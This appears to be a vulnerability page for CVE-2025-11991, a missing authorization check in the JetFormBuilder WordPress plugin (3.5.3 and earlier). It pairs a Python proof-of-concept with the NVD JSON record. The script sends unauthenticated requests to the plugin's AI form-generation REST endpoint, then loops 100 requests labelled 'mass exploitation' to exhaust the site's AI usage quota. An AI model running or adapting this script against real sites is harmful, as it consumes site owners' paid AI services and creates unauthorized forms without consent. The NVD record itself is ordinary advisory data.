CVE-2025-11991

import requests import json # CVE-2025-11991 PoC - Unauthorized AI Form Generation # Target: WordPress site with JetFormBuilder plugin <= 3.5.3 target_url = "http://target-wordpress-site.com" # Identify the REST API endpoint for AI form generation api_endpoint = f"{target_url}/wp-json/jet-form-builder/v1/generate-form" # Prepare the malicious request without authentication payload = { "form_name": "Malicious Form", "form_description": "Form generated by unauthorized attacker", "form_fields": [ {"type": "text", "name": "field1", "label": "Name"}, {"type": "email", "name": "field2", "label": "Email"} ] } headers = { "Content-Type": "application/json", "User-Agent": "Mozilla/5.0" } print("[*] Sending unauthorized AI form generation request...") print(f"[*] Target: {api_endpoint}") try: # Send POST request without authentication cookie response = requests.post( api_endpoint, json=payload, headers=headers, timeout=30 ) print(f"[*] Status Code: {response.status_code}") print(f"[*] Response: {response.text}") if response.status_code == 200: print("[+] SUCCESS: Form generation endpoint accessible without authentication!") print("[+] AI quota consumption attack is possible") elif response.status_code == 401 or response.status_code == 403: print("[-] FAILED: Endpoint requires authentication (may be patched)") else: print(f"[*] Unexpected response: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") # Mass exploitation to consume AI quota print("\n[*] Mass exploitation script for quota exhaustion:") for i in range(100): payload["form_name"] = f"Attacker Form {i}" try: requests.post(api_endpoint, json=payload, headers=headers, timeout=10) print(f"[*] Request {i+1}/100 sent") except: pass

{"cve": {"id": "CVE-2025-11991", "sourceIdentifier": "[email protected]", "published": "2025-12-16T08:15:50.650", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The JetFormBuilder — Dynamic Blocks Form Builder plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the run_callback function in all versions up to, and including, 3.5.3. This makes it possible for unauthenticated attackers to generate forms using AI, consuming site's AI usage limits."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/jetformbuilder/tags/3.5.2.1/modules/ai/rest-api/endpoints/generate-form-endpoint.php#L26", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/c08444ef-77bc-4e9d-8d94-04b90cc99ded?source=cve", "source": "[email protected]"}]}}